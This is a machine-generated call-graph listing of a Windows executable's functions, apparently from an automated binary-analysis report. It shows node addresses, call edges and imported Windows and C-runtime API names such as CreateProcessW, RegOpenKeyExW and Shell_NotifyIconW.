98645 de8c25 98694 d80000 98645->98694 98648 de8c5f 98698 d67d51 98648->98698 98649 de8c45 98733 dd3ef6 81 API calls __wsopen_s 98649->98733 98652 de8c50 GetCurrentProcess TerminateProcess 98652->98648 98655->97893 98657 d71c50 8 API calls 98660 de8c9e 98657->98660 98658->98633 98658->98640 98658->98655 98731 dc4a0c 8 API calls __fread_nolock 98658->98731 98732 de8e7c 41 API calls _strftime 98658->98732 98659 de8e22 98659->98655 98662 de8e36 FreeLibrary 98659->98662 98663 de94da 74 API calls 98660->98663 98662->98655 98666 de8caf 98663->98666 98665 d6b3fe 8 API calls 98665->98666 98666->98659 98666->98665 98709 d71c50 98666->98709 98720 de94da 98666->98720 98668 d6c269 8 API calls 98667->98668 98669 de964d CharLowerBuffW 98668->98669 98670 dc96e3 41 API calls 98669->98670 98671 de966e 98670->98671 98673 d6bf07 8 API calls 98671->98673 98679 de96a7 _wcslen 98671->98679 98674 de9689 98673->98674 98675 d68685 8 API calls 98674->98675 98676 de969d 98675->98676 98677 d696d9 8 API calls 98676->98677 98677->98679 98678 de97bd _wcslen 98678->98658 98679->98678 98735 de8e7c 41 API calls _strftime 98679->98735 98681 de87fe 98680->98681 98682 de8849 98680->98682 98683 d8019b 8 API calls 98681->98683 98686 de99f5 98682->98686 98684 de8820 98683->98684 98684->98682 98685 d8016b 8 API calls 98684->98685 98685->98684 98687 de9c0a ISource 98686->98687 98692 de9a19 _strcat _wcslen ___std_exception_copy 98686->98692 98687->98645 98688 d6c92d 39 API calls 98688->98692 98689 d6c5df 39 API calls 98689->98692 98690 d6c9fb 39 API calls 98690->98692 98691 d68e70 52 API calls 98691->98692 98692->98687 98692->98688 98692->98689 98692->98690 98692->98691 98736 dcf7da 10 API calls _wcslen 98692->98736 98696 d80015 98694->98696 98695 d800ad CreateProcessW 98697 d8007b 98695->98697 98696->98695 98696->98697 98697->98648 98697->98649 98699 d67d59 98698->98699 98700 d8016b 8 API calls 98699->98700 98701 d67d67 98700->98701 98737 d68386 98701->98737 98704 d683b0 98705 d6c700 8 API calls 98704->98705 98706 d683c0 98705->98706 98707 d8019b 8 API calls 98706->98707 98708 d6845c 98706->98708 98707->98708 98708->98657 98708->98666 98710 d71c62 98709->98710 98713 d71c6b 98710->98713 98740 d7b71c 8 API calls 98710->98740 98712 d71d20 98712->98666 98713->98712 98714 d8016b 8 API calls 98713->98714 98715 d71d89 98714->98715 98716 d8016b 8 API calls 98715->98716 98721 de94f2 98720->98721 98730 de950e 98720->98730 98722 de951a 98721->98722 98723 de94f9 98721->98723 98724 de95c3 98721->98724 98721->98730 98727 d66ab6 8 API calls 98722->98727 98741 dcf3fd 10 API calls _strlen 98723->98741 98742 dd15b3 72 API calls ISource 98724->98742 98727->98730 98728 de9503 98729 d66ab6 8 API calls 98728->98729 98729->98730 98730->98666 98731->98658 98732->98658 98733->98652 98734->98637 98735->98678 98736->98692 98738 d8016b 8 API calls 98737->98738 98739 d67d6f 98738->98739 98739->98704 98740->98713 98741->98728 98742->98730 98744 dce72e 98743->98744 98745 dce745 98744->98745 98748 dce74b 98744->98748 98749 d86742 GetStringTypeW _strftime 98744->98749 98750 d8668b 39 API calls _strftime 98745->98750 98748->97454 98749->98744 98750->98748 98751 d6367c 98754 d63696 98751->98754 98755 d636ad 98754->98755 98756 d636b2 98755->98756 98757 d63711 98755->98757 98793 d6370f 98755->98793 98761 d636bf 98756->98761 98762 d6378b PostQuitMessage 98756->98762 98759 d63717 98757->98759 98760 da3dce 98757->98760 98758 d636f6 DefWindowProcW 98796 d63690 98758->98796 98763 d63743 SetTimer RegisterWindowMessageW 98759->98763 98764 d6371e 98759->98764 98810 d62f24 10 API calls 98760->98810 98765 da3e3b 98761->98765 98766 d636ca 98761->98766 98762->98796 98770 d6376c CreatePopupMenu 98763->98770 98763->98796 98768 d63727 KillTimer 98764->98768 98769 da3d6f 98764->98769 98815 dcc80c 65 API calls ___scrt_fastfail 98765->98815 98771 d636d4 98766->98771 98772 d63795 98766->98772 98806 d6388e Shell_NotifyIconW ___scrt_fastfail 98768->98806 98776 da3daa MoveWindow 98769->98776 98777 da3d74 98769->98777 98770->98796 98779 d636df 98771->98779 98780 da3e20 98771->98780 98799 d7fcbb 98772->98799 98774 da3def 98811 d7f1c6 40 API calls 98774->98811 98776->98796 98783 da3d7a 98777->98783 98784 da3d99 SetFocus 98777->98784 98786 d63779 98779->98786 98791 d636ea 98779->98791 98780->98758 98814 dc1367 8 API calls 98780->98814 98781 da3e4d 98781->98758 98781->98796 98787 da3d83 98783->98787 98783->98791 98784->98796 98785 d6373a 98807 d6572c DeleteObject DestroyWindow 98785->98807 98808 d637a6 75 API calls ___scrt_fastfail 98786->98808 98809 d62f24 10 API calls 98787->98809 98791->98758 98812 d6388e Shell_NotifyIconW ___scrt_fastfail 98791->98812 98793->98758 98794 d63789 98794->98796 98797 da3e14 98813 d638f2 60 API calls ___scrt_fastfail 98797->98813 98800 d7fcd3 ___scrt_fastfail 98799->98800 98801 d7fd59 98799->98801 98816 d65f59 98800->98816 98801->98796 98803 d7fcfa 98804 d7fd42 KillTimer SetTimer 98803->98804 98805 dbfdcb Shell_NotifyIconW 98803->98805 98804->98801 98805->98804 98806->98785 98807->98796 98808->98794 98809->98796 98810->98774 98811->98791 98812->98797 98813->98793 98814->98793 98815->98781 98817 d65f76 98816->98817 98836 d66058 98816->98836 98818 d67a14 8 API calls 98817->98818 98819 d65f84 98818->98819 98820 d65f91 98819->98820 98821 da5101 LoadStringW 98819->98821 98822 d684b7 8 API calls 98820->98822 98824 da511b 98821->98824 98823 d65fa6 98822->98823 98825 d65fb3 98823->98825 98826 da5137 98823->98826 98828 d6be6d 8 API calls 98824->98828 98830 d65fd9 ___scrt_fastfail 98824->98830 98825->98824 98827 d65fbd 98825->98827 98826->98830 98833 da517a 98826->98833 98835 d6bf07 8 API calls 98826->98835 98829 d665a4 8 API calls 98827->98829 98828->98830 98831 d65fcb 98829->98831 98834 d6603e Shell_NotifyIconW 98830->98834 98832 d67af4 8 API calls 98831->98832 98832->98830 98847 d7fe8f 51 API calls 98833->98847 98834->98836 98837 da5161 98835->98837 98836->98803 98846 dca265 9 API calls 98837->98846 98840 da516c 98842 d67af4 8 API calls 98840->98842 98841 da5199 98843 d665a4 8 API calls 98841->98843 98842->98833 98844 da51aa 98843->98844 98845 d665a4 8 API calls 98844->98845 98845->98830 98846->98840 98847->98841 98848 d98792 98853 d9854e 98848->98853 98851 d987ba 98858 d9857f try_get_first_available_module 98853->98858 98855 d9877e 98877 d92b7c 26 API calls ___std_exception_copy 98855->98877 98857 d986d3 98857->98851 98865 da0d24 98857->98865 98861 d986c8 98858->98861 98868 d8919b 98858->98868 98861->98857 98876 d8f669 20 API calls __dosmaperr 98861->98876 98862 d8919b 40 API calls 98863 d9873b 98862->98863 98863->98861 98864 d8919b 40 API calls 98863->98864 98864->98861 98881 da0421 98865->98881 98867 da0d3f 98867->98851 98869 d8923b 98868->98869 98870 d891af 98868->98870 98880 d89253 40 API calls 3 library calls 98869->98880 98875 d891d1 98870->98875 98878 d8f669 20 API calls __dosmaperr 98870->98878 98873 d891c6 98879 d92b7c 26 API calls ___std_exception_copy 98873->98879 98875->98861 98875->98862 98876->98855 98877->98857 98878->98873 98879->98875 98880->98875 98883 da042d ___scrt_is_nonwritable_in_current_image 98881->98883 98882 da043b 98939 d8f669 20 API calls __dosmaperr 98882->98939 98883->98882 98885 da0474 98883->98885 98892 da09fb 98885->98892 98886 da0440 98940 d92b7c 26 API calls ___std_exception_copy 98886->98940 98891 da044a __wsopen_s 98891->98867 98942 da07cf 98892->98942 98895 da0a2d 98974 d8f656 20 API calls __dosmaperr 98895->98974 98896 da0a46 98960 d955b1 98896->98960 98899 da0a4b 98901 da0a6b 98899->98901 98902 da0a54 98899->98902 98900 da0a32 98975 d8f669 20 API calls __dosmaperr 98900->98975 98973 da073a CreateFileW 98901->98973 98976 d8f656 20 API calls __dosmaperr 98902->98976 98906 da0a59 98977 d8f669 20 API calls __dosmaperr 98906->98977 98907 da0498 98941 da04c1 LeaveCriticalSection __wsopen_s 98907->98941 98909 da0b21 GetFileType 98910 da0b2c GetLastError 98909->98910 98911 da0b73 98909->98911 98980 d8f633 20 API calls __dosmaperr 98910->98980 98982 d954fa 21 API calls 2 library calls 98911->98982 98912 da0af6 GetLastError 98979 d8f633 20 API calls __dosmaperr 98912->98979 98915 da0aa4 98915->98909 98915->98912 98978 da073a CreateFileW 98915->98978 98916 da0b3a CloseHandle 98916->98900 98918 da0b63 98916->98918 98981 d8f669 20 API calls __dosmaperr 98918->98981 98920 da0ae9 98920->98909 98920->98912 98921 da0b94 98923 da0be0 98921->98923 98983 da094b 72 API calls 3 library calls 98921->98983 98928 da0c0d 98923->98928 98984 da04ed 72 API calls 4 library calls 98923->98984 98924 da0b68 98924->98900 98927 da0c06 98927->98928 98929 da0c1e 98927->98929 98985 d98a3e 98928->98985 98929->98907 98931 da0c9c CloseHandle 98929->98931 99000 da073a CreateFileW 98931->99000 98933 da0cc7 98934 da0cfd 98933->98934 98935 da0cd1 GetLastError 98933->98935 98934->98907 99001 d8f633 20 API calls __dosmaperr 98935->99001 98937 da0cdd 99002 d956c3 21 API calls 2 library calls 98937->99002 98939->98886 98940->98891 98941->98891 98943 da07f0 98942->98943 98944 da080a 98942->98944 98943->98944 99010 d8f669 20 API calls __dosmaperr 98943->99010 99003 da075f 98944->99003 98947 da07ff 99011 d92b7c 26 API calls ___std_exception_copy 98947->99011 98949 da0842 98950 da0871 98949->98950 99012 d8f669 20 API calls __dosmaperr 98949->99012 98951 da08c4 98950->98951 99014 d8da9d 26 API calls 2 library calls 98950->99014 98951->98895 98951->98896 98954 da08bf 98954->98951 98956 da093e 98954->98956 98955 da0866 99013 d92b7c 26 API calls ___std_exception_copy 98955->99013 99015 d92b8c 11 API calls _abort 98956->99015 98959 da094a 98961 d955bd ___scrt_is_nonwritable_in_current_image 98960->98961 99018 d932ee EnterCriticalSection 98961->99018 98963 d955c4 98964 d955e9 98963->98964 98969 d95657 EnterCriticalSection 98963->98969 98970 d9560b 98963->98970 99022 d95390 98964->99022 98966 d95634 __wsopen_s 98966->98899 98969->98970 98971 d95664 LeaveCriticalSection 98969->98971 99019 d956ba 98970->99019 98971->98963 98973->98915 98974->98900 98975->98907 98976->98906 98977->98900 98978->98920 98979->98900 98980->98916 98981->98924 98982->98921 98983->98923 98984->98927 99048 d95754 98985->99048 98987 d98a54 99061 d956c3 21 API calls 2 library calls 98987->99061 98988 d98a4e 98988->98987 98989 d98a86 98988->98989 98991 d95754 __wsopen_s 26 API calls 98988->98991 98989->98987 98992 d95754 __wsopen_s 26 API calls 98989->98992 98995 d98a7d 98991->98995 98996 d98a92 CloseHandle 98992->98996 98993 d98aac 98994 d98ace 98993->98994 99062 d8f633 20 API calls __dosmaperr 98993->99062 98994->98907 98998 d95754 __wsopen_s 26 API calls 98995->98998 98996->98987 98999 d98a9e GetLastError 98996->98999 98998->98989 98999->98987 99000->98933 99001->98937 99002->98934 99005 da0777 99003->99005 99004 da0792 99004->98949 99005->99004 99016 d8f669 20 API calls __dosmaperr 99005->99016 99007 da07b6 99017 d92b7c 26 API calls ___std_exception_copy 99007->99017 99009 da07c1 99009->98949 99010->98947 99011->98944 99012->98955 99013->98950 99014->98954 99015->98959 99016->99007 99017->99009 99018->98963 99030 d93336 LeaveCriticalSection 99019->99030 99021 d956c1 99021->98966 99031 d9500d 99022->99031 99025 d953a2 99028 d953af 99025->99028 99038 d93795 11 API calls 2 library calls 99025->99038 99026 d95401 99026->98970 99029 d954d7 EnterCriticalSection 99026->99029 99039 d92d58 99028->99039 99029->98970 99030->99021 99037 d9501a __dosmaperr 99031->99037 99032 d9505a 99046 d8f669 20 API calls __dosmaperr 99032->99046 99033 d95045 RtlAllocateHeap 99035 d95058 99033->99035 99033->99037 99035->99025 99037->99032 99037->99033 99045 d8523d 7 API calls 2 library calls 99037->99045 99038->99025 99040 d92d8c __dosmaperr 99039->99040 99041 d92d63 RtlFreeHeap 99039->99041 99040->99026 99041->99040 99042 d92d78 99041->99042 99047 d8f669 20 API calls __dosmaperr 99042->99047 99044 d92d7e GetLastError 99044->99040 99045->99037 99046->99035 99047->99044 99049 d95761 99048->99049 99050 d95776 99048->99050 99063 d8f656 20 API calls __dosmaperr 99049->99063 99054 d9579b 99050->99054 99065 d8f656 20 API calls __dosmaperr 99050->99065 99053 d95766 99064 d8f669 20 API calls __dosmaperr 99053->99064 99054->98988 99055 d957a6 99066 d8f669 20 API calls __dosmaperr 99055->99066 99058 d9576e 99058->98988 99059 d957ae 99067 d92b7c 26 API calls ___std_exception_copy 99059->99067 99061->98993 99062->98994 99063->99053 99064->99058 99065->99055 99066->99059 99067->99058 99068 d6105b 99073 d6522e 99068->99073 99070 d6106a 99104 d80433 29 API calls __onexit 99070->99104 99072 d61074 99074 d6523e __wsopen_s 99073->99074 99075 d6bf07 8 API calls 99074->99075 99076 d652f4 99075->99076 99105 d6551b 99076->99105 99078 d652fd 99112 d651bf 99078->99112 99081 d665a4 8 API calls 99082 d65316 99081->99082 99118 d6684e 99082->99118 99085 d6bf07 8 API calls 99086 d6532e 99085->99086 99087 d6bceb 8 API calls 99086->99087 99088 d65337 RegOpenKeyExW 99087->99088 99089 da4bc0 RegQueryValueExW 99088->99089 99094 d65359 99088->99094 99090 da4bdd 99089->99090 99091 da4c56 RegCloseKey 99089->99091 99093 d8019b 8 API calls 99090->99093 99092 da4c68 _wcslen 99091->99092 99091->99094 99092->99094 99101 d6b25f 8 API calls 99092->99101 99102 d6684e 8 API calls 99092->99102 99103 d6627c 8 API calls 99092->99103 99095 da4bf6 99093->99095 99094->99070 99096 d641a6 8 API calls 99095->99096 99097 da4c01 RegQueryValueExW 99096->99097 99098 da4c1e 99097->99098 99100 da4c38 ISource 99097->99100 99099 d684b7 8 API calls 99098->99099 99099->99100 99100->99091 99101->99092 99102->99092 99103->99092 99104->99072 99106 da22f0 __wsopen_s 99105->99106 99107 d65528 GetModuleFileNameW 99106->99107 99108 d6b25f 8 API calls 99107->99108 99109 d6554e 99108->99109 99110 d6557e 9 API calls 99109->99110 99111 d65558 99110->99111 99111->99078 99113 da22f0 __wsopen_s 99112->99113 99114 d651cc GetFullPathNameW 99113->99114 99115 d651ee 99114->99115 99116 d684b7 8 API calls 99115->99116 99117 d6520c 99116->99117 99117->99081 99119 d6685d 99118->99119 99123 d6687e __fread_nolock 99118->99123 99122 d8019b 8 API calls 99119->99122 99120 d8016b 8 API calls 99121 d65325 99120->99121 99121->99085 99122->99123 99123->99120 99124 d61098 99129 d65d78 99124->99129 99128 d610a7 99130 d6bf07 8 API calls 99129->99130 99131 d65d8f GetVersionExW 99130->99131 99132 d684b7 8 API calls 99131->99132 99133 d65ddc 99132->99133 99134 d696d9 8 API calls 99133->99134 99136 d65e12 99133->99136 99135 d65e06 99134->99135 99138 d679ed 8 API calls 99135->99138 99137 d65ecc GetCurrentProcess IsWow64Process 99136->99137 99142 da50ad 99136->99142 99139 d65ee8 99137->99139 99138->99136 99140 d65f00 LoadLibraryA 99139->99140 99141 da50f2 GetSystemInfo 99139->99141 99143 d65f11 GetProcAddress 99140->99143 99144 d65f4d GetSystemInfo 99140->99144 99143->99144 99145 d65f21 GetNativeSystemInfo 99143->99145 99146 d65f27 99144->99146 99145->99146 99147 d6109d 99146->99147 99148 d65f2b FreeLibrary 99146->99148 99149 d80433 29 API calls __onexit 99147->99149 99148->99147 99149->99128 99150 db55f4 99159 d7e34f 99150->99159 99152 db560a 99155 db5685 99152->99155 99168 d7a9e5 9 API calls 99152->99168 99157 db617b 99155->99157 99170 dd3ef6 81 API calls __wsopen_s 99155->99170 99156 db5665 99156->99155 99169 dd2393 8 API calls 99156->99169 99160 d7e370 99159->99160 99161 d7e35d 99159->99161 99163 d7e375 99160->99163 99164 d7e3a3 99160->99164 99162 d6b3fe 8 API calls 99161->99162 99167 d7e367 99162->99167 99165 d8016b 8 API calls 99163->99165 99166 d6b3fe 8 API calls 99164->99166 99165->99167 99166->99167 99167->99152 99168->99156 99169->99155 99170->99157 99171 d61044 99176 d62735 99171->99176 99213 d629da 99176->99213 99180 d627ac 99181 d6bf07 8 API calls 99180->99181 99182 d627b6 99181->99182 99183 d6bf07 8 API calls 99182->99183 99184 d627c0 99183->99184 99185 d6bf07 8 API calls 99184->99185 99186 d627ca 99185->99186 99187 d6bf07 8 API calls 99186->99187 99188 d62808 99187->99188 99189 d6bf07 8 API calls 99188->99189 99190 d628d4 99189->99190 99223 d62d5e 99190->99223 99194 d62906 99195 d6bf07 8 API calls 99194->99195 99196 d62910 99195->99196 99197 d730e0 9 API calls 99196->99197 99198 d6293b 99197->99198 99244 d630ed 99198->99244 99200 d62957 99253 d62a33 99213->99253 99216 d62a33 8 API calls 99217 d62a12 99216->99217 99218 d6bf07 8 API calls 99217->99218 99219 d62a1e 99218->99219 99220 d684b7 8 API calls 99219->99220 99221 d6276b 99220->99221 99222 d63205 6 API calls 99221->99222 99222->99180 99224 d6bf07 8 API calls 99223->99224 99225 d62d6e 99224->99225 99226 d6bf07 8 API calls 99225->99226 99227 d62d76 99226->99227 99228 d6bf07 8 API calls 99227->99228 99229 d62d91 99228->99229 99230 d8016b 8 API calls 99229->99230 99231 d628de 99230->99231 99232 d6318c 99231->99232 99233 d6319a 99232->99233 99234 d6bf07 8 API calls 99233->99234 99235 d631a5 99234->99235 99236 d6bf07 8 API calls 99235->99236 99237 d631b0 99236->99237 99238 d6bf07 8 API calls 99237->99238 99239 d631bb 99238->99239 99240 d6bf07 8 API calls 99239->99240 99241 d631c6 99240->99241 99242 d8016b 8 API calls 99241->99242 99243 d631d8 RegisterWindowMessageW 99242->99243 99243->99194 99245 da3c69 99244->99245 99246 d630fd 99244->99246 99260 dd3b63 8 API calls 99245->99260 99248 d8016b 8 API calls 99246->99248 99250 d63105 99248->99250 99249 da3c74 99250->99200 99254 d6bf07 8 API calls 99253->99254 99255 d62a3e 99254->99255 99256 d6bf07 8 API calls 99255->99256 99257 d62a46 99256->99257 99258 d6bf07 8 API calls 99257->99258 99259 d62a08 99258->99259 99259->99216 99260->99249 99262 db1a68 99263 db1a70 99262->99263 99266 d6d4e5 99262->99266 99300 dc79af 8 API calls __fread_nolock 99263->99300 99265 db1a82 99301 dc7928 8 API calls __fread_nolock 99265->99301 99268 d8016b 8 API calls 99266->99268 99270 d6d539 99268->99270 99269 db1aac 99271 d702f0 254 API calls 99269->99271 99292 d6c2cd 99270->99292 99272 db1ad3 99271->99272 99274 db1ae7 99272->99274 99302 de60a2 53 API calls _wcslen 99272->99302 99277 d8016b 8 API calls 99284 d6d61e ISource 99277->99284 99278 db1b04 99278->99266 99303 dc79af 8 API calls __fread_nolock 99278->99303 99280 d6d8c1 ISource 99281 d6c34b 8 API calls 99280->99281 99289 d6d95c ISource 99280->99289 99281->99289 99282 d6be6d 8 API calls 99282->99284 99283 d6b3fe 8 API calls 99283->99284 99284->99280 99284->99282 99284->99283 99287 db1f1c 99284->99287 99288 db1f37 99284->99288 99291 d6c34b 8 API calls 99284->99291 99286 d6d973 99304 dc55d9 8 API calls ISource 99287->99304 99289->99286 99299 d7e284 8 API calls ISource 99289->99299 99291->99284 99295 d6c2dd 99292->99295 99293 d6c2e5 99293->99277 99294 d8016b 8 API calls 99294->99295 99295->99293 99295->99294 99296 d6bf07 8 API calls 99295->99296 99297 d6be6d 8 API calls 99295->99297 99298 d6c2cd 8 API calls 99295->99298 99296->99295 99297->99295 99298->99295 99299->99289 99300->99265 99301->99269 99302->99278 99303->99278 99304->99288 99305 d8078b 99306 d80797 ___scrt_is_nonwritable_in_current_image 99305->99306 99335 d80241 99306->99335 99308 d8079e 99309 d808f1 99308->99309 99312 d807c8 99308->99312 99376 d80bcf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 99309->99376 99311 d808f8 99369 d851e2 99311->99369 99321 d80807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 99312->99321 99346 d9280d 99312->99346 99319 d807e7 99325 d80868 99321->99325 99372 d851aa 38 API calls 2 library calls 99321->99372 99323 d8086e 99358 d632a2 99323->99358 99354 d80ce9 99325->99354 99329 d8088a 99329->99311 99330 d8088e 99329->99330 99331 d80897 99330->99331 99374 d85185 28 API calls _abort 99330->99374 99375 d803d0 13 API calls 2 library calls 99331->99375 99334 d8089f 99334->99319 99336 d8024a 99335->99336 99378 d80a28 IsProcessorFeaturePresent 99336->99378 99338 d80256 99379 d83024 10 API calls 3 library calls 99338->99379 99340 d8025b 99341 d8025f 99340->99341 99380 d926a7 99340->99380 99341->99308 99344 d80276 99344->99308 99349 d92824 99346->99349 99347 d80e1c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 99348 d807e1 99347->99348 99348->99319 99350 d927b1 99348->99350 99349->99347 99352 d927e0 99350->99352 99351 d80e1c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 99353 d92809 99351->99353 99352->99351 99353->99321 99431 d826d0 99354->99431 99356 d80cfc GetStartupInfoW 99357 d80d0f 99356->99357 99357->99323 99359 d632ae IsThemeActive 99358->99359 99360 d63309 99358->99360 99433 d852d3 99359->99433 99373 d80d22 GetModuleHandleW 99360->99373 99362 d632d9 99439 d85339 99362->99439 99364 d632e0 99446 d6326d SystemParametersInfoW SystemParametersInfoW 99364->99446 99366 d632e7 99447 d63312 99366->99447 100311 d84f5f 99369->100311 99372->99325 99373->99329 99374->99331 99375->99334 99376->99311 99378->99338 99379->99340 99384 d9d596 99380->99384 99383 d8304d 8 API calls 3 library calls 99383->99341 99385 d9d5b3 99384->99385 99388 d9d5af 99384->99388 99385->99388 99390 d94f8b 99385->99390 99387 d80268 99387->99344 99387->99383 99402 d80e1c 99388->99402 99391 d94f97 ___scrt_is_nonwritable_in_current_image 99390->99391 99409 d932ee EnterCriticalSection 99391->99409 99393 d94f9e 99410 d9543f 99393->99410 99395 d94fad 99396 d94fbc 99395->99396 99423 d94e1f 29 API calls 99395->99423 99425 d94fd8 LeaveCriticalSection _abort 99396->99425 99399 d94fb7 99424 d94ed5 GetStdHandle GetFileType 99399->99424 99400 d94fcd __wsopen_s 99400->99385 99403 d80e25 99402->99403 99404 d80e27 IsProcessorFeaturePresent 99402->99404 99403->99387 99406 d80fee 99404->99406 99430 d80fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 99406->99430 99408 d810d1 99408->99387 99409->99393 99411 d9544b ___scrt_is_nonwritable_in_current_image 99410->99411 99412 d95458 99411->99412 99413 d9546f 99411->99413 99427 d8f669 20 API calls __dosmaperr 99412->99427 99426 d932ee EnterCriticalSection 99413->99426 99416 d9545d 99428 d92b7c 26 API calls ___std_exception_copy 99416->99428 99418 d95467 __wsopen_s 99418->99395 99419 d954a7 99429 d954ce LeaveCriticalSection _abort 99419->99429 99421 d9547b 99421->99419 99422 d95390 __wsopen_s 21 API calls 99421->99422 99422->99421 99423->99399 99424->99396 99425->99400 99426->99421 99427->99416 99428->99418 99429->99418 99430->99408 99432 d826e7 99431->99432 99432->99356 99432->99432 99434 d852df ___scrt_is_nonwritable_in_current_image 99433->99434 99496 d932ee EnterCriticalSection 99434->99496 99436 d852ea pre_c_initialization 99497 d8532a 99436->99497 99438 d8531f __wsopen_s 99438->99362 99440 d8535f 99439->99440 99441 d85345 99439->99441 99440->99364 99441->99440 99501 d8f669 20 API calls __dosmaperr 99441->99501 99443 d8534f 99502 d92b7c 26 API calls ___std_exception_copy 99443->99502 99445 d8535a 99445->99364 99446->99366 99448 d63322 __wsopen_s 99447->99448 99449 d6bf07 8 API calls 99448->99449 99450 d6332e GetCurrentDirectoryW 99449->99450 99503 d64f60 99450->99503 99496->99436 99500 d93336 LeaveCriticalSection 99497->99500 99499 d85331 99499->99438 99500->99499 99501->99443 99502->99445 99504 d6bf07 8 API calls 99503->99504 99505 d64f76 99504->99505 99618 d660f5 99505->99618 99507 d64f94 99508 d6bceb 8 API calls 99507->99508 99509 d64fa8 99508->99509 99510 d6be6d 8 API calls 99509->99510 99511 d64fb3 99510->99511 99632 d688e8 99511->99632 99514 d6b25f 8 API calls 99515 d64fcc 99514->99515 99619 d66102 __wsopen_s 99618->99619 99620 d684b7 8 API calls 99619->99620 99621 d66134 99619->99621 99620->99621 99622 d6627c 8 API calls 99621->99622 99628 d6616a 99621->99628 99622->99621 99623 d6627c 8 API calls 99623->99628 99624 d6b25f 8 API calls 99625 d66261 99624->99625 99627 d6684e 8 API calls 99625->99627 99626 d6b25f 8 API calls 99626->99628 99629 d6626d 99627->99629 99628->99623 99628->99626 99630 d6684e 8 API calls 99628->99630 99631 d66238 99628->99631 99629->99507 99630->99628 99631->99624 99631->99629 99633 d8016b 8 API calls 99632->99633 99634 d64fbf 99633->99634 99634->99514 100312 d84f6b _abort 100311->100312 100313 d84f72 100312->100313 100314 d84f84 100312->100314 100350 d850b9 GetModuleHandleW 100313->100350 100335 d932ee EnterCriticalSection 100314->100335 100317 d84f77 100317->100314 100351 d850fd GetModuleHandleExW 100317->100351 100320 d84f8b 100322 d85000 100320->100322 100333 d85029 100320->100333 100336 d92538 100320->100336 100330 d927b1 _abort 5 API calls 100322->100330 100332 d85018 100322->100332 100324 d85072 100359 da20c9 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 100324->100359 100325 d85046 100342 d85078 100325->100342 100326 d927b1 _abort 5 API calls 100326->100333 100330->100332 100332->100326 100339 d85069 100333->100339 100335->100320 100360 d92271 100336->100360 100379 d93336 LeaveCriticalSection 100339->100379 100341 d85042 100341->100324 100341->100325 100380 d9399c 100342->100380 100345 d850a6 100348 d850fd _abort 8 API calls 100345->100348 100346 d85086 GetPEB 100346->100345 100347 d85096 GetCurrentProcess TerminateProcess 100346->100347 100347->100345 100349 d850ae ExitProcess 100348->100349 100350->100317 100352 d8514a 100351->100352 100353 d85127 GetProcAddress 100351->100353 100354 d85159 100352->100354 100355 d85150 FreeLibrary 100352->100355 100357 d8513c 100353->100357 100356 d80e1c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 100354->100356 100355->100354 100358 d84f83 100356->100358 100357->100352 100358->100314 100363 d92220 100360->100363 100362 d92295 100362->100322 100364 d9222c ___scrt_is_nonwritable_in_current_image 100363->100364 100371 d932ee EnterCriticalSection 100364->100371 100366 d9223a 100372 d922c1 100366->100372 100370 d92258 __wsopen_s 100370->100362 100371->100366 100373 d922e1 100372->100373 100376 d922e9 100372->100376 100374 d80e1c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 100373->100374 100375 d92247 100374->100375 100378 d92265 LeaveCriticalSection _abort 100375->100378 100376->100373 100377 d92d58 _free 20 API calls 100376->100377 100377->100373 100378->100370 100379->100341 100381 d939c1 100380->100381 100382 d939b7 100380->100382 100387 d93367 5 API calls 2 library calls 100381->100387 100384 d80e1c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 100382->100384 100385 d85082 100384->100385 100385->100345 100385->100346 100386 d939d8 100386->100382 100387->100386 100388 d8f08e 100389 d8f09a ___scrt_is_nonwritable_in_current_image 100388->100389 100390 d8f0bb 100389->100390 100391 d8f0a6 100389->100391 100401 d8951d EnterCriticalSection 100390->100401 100407 d8f669 20 API calls __dosmaperr 100391->100407 100394 d8f0ab 100408 d92b7c 26 API calls ___std_exception_copy 100394->100408 100395 d8f0c7 100402 d8f0fb 100395->100402 100400 d8f0b6 __wsopen_s 100401->100395 100410 d8f126 100402->100410 100404 d8f108 100405 d8f0d4 100404->100405 100430 d8f669 20 API calls __dosmaperr 100404->100430 100409 d8f0f1 LeaveCriticalSection __fread_nolock 100405->100409 100407->100394 100408->100400 100409->100400 100411 d8f14e 100410->100411 100412 d8f134 100410->100412 100413 d8dce5 __fread_nolock 26 API calls 100411->100413 100434 d8f669 20 API calls __dosmaperr 100412->100434 100415 d8f157 100413->100415 100431 d99799 100415->100431 100416 d8f139 100435 d92b7c 26 API calls ___std_exception_copy 100416->100435 100418 d8f144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 100418->100404 100421 d8f25b 100423 d8f268 100421->100423 100427 d8f20e 100421->100427 100422 d8f1df 100424 d8f1fc 100422->100424 100422->100427 100437 d8f669 20 API calls __dosmaperr 100423->100437 100436 d8f43f 31 API calls 4 library calls 100424->100436 100427->100418 100438 d8f2bb 30 API calls 2 library calls 100427->100438 100428 d8f206 100428->100418 100430->100405 100439 d99616 100431->100439 100433 d8f173 100433->100418 100433->100421 100433->100422 100434->100416 100435->100418 100436->100428 100437->100418 100438->100418 100440 d99622 ___scrt_is_nonwritable_in_current_image 100439->100440 100441 d9962a 100440->100441 100442 d99642 100440->100442 100474 d8f656 20 API calls __dosmaperr 100441->100474 100444 d996f6 100442->100444 100448 d9967a 100442->100448 100479 d8f656 20 API calls __dosmaperr 100444->100479 100445 d9962f 100475 d8f669 20 API calls __dosmaperr 100445->100475 100464 d954d7 EnterCriticalSection 100448->100464 100449 d996fb 100480 d8f669 20 API calls __dosmaperr 100449->100480 100452 d99680 100454 d996b9 100452->100454 100455 d996a4 100452->100455 100453 d99703 100481 d92b7c 26 API calls ___std_exception_copy 100453->100481 100465 d9971b 100454->100465 100476 d8f669 20 API calls __dosmaperr 100455->100476 100459 d99637 __wsopen_s 100459->100433 100460 d996b4 100478 d996ee LeaveCriticalSection __wsopen_s 100460->100478 100461 d996a9 100477 d8f656 20 API calls __dosmaperr 100461->100477 100464->100452 100466 d95754 __wsopen_s 26 API calls 